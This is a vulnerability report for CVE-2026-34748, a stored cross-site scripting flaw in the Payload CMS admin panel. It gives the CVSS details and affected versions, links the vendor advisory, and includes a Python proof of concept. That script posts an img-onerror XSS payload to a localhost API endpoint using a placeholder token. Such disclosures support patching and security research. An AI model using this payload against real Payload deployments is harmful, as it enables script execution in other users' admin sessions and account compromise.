Security Vulnerability Report
CVE-2026-34748 CVSS 8.7 HIGH

CVE-2026-34748

Published: 2026-04-01 20:16:27
Last Modified: 2026-04-13 19:13:21

Description

Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/next, a stored Cross-Site Scripting (XSS) vulnerability existed in the admin panel. An authenticated user with write access to a collection could save content that, when viewed by another user, would execute in their browser. This issue has been patched in version 3.78.0.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:* - VULNERABLE
@payloadcms/next < 3.78.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-34748 (Stored XSS)
# This script demonstrates how an authenticated user might inject a payload.
import requests

# Configuration
TARGET_URL = "http://localhost:3000/api/pages"  # Example endpoint
API_TOKEN = "your_valid_jwt_token"

# Headers
headers = {
    "Authorization": f"Bearer {API_TOKEN}",
    "Content-Type": "application/json",
}

# Malicious Payload construction
# Using an img tag with onerror is a common bypass for simple filters
malicious_content = "<img src=x onerror=alert('CVE-2026-34748-XSS')>"

payload_data = {
    "title": "Test Document",
    "content": malicious_content,
}

try:
    # Send POST request to store the payload
    response = requests.post(TARGET_URL, json=payload_data, headers=headers)
    if response.status_code in (200, 201):
        print("[+] Payload injected successfully!")
        print("[+] Navigate to the admin panel to view the collection item and trigger the XSS.")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

Vendor Advisory (Mitigation): https://github.com/payloadcms/payload/security/advisories/GHSA-mmxc-95ch-2j7c
Weakness: CWE-79 (Improper Neutralization of Input During Web Page Generation)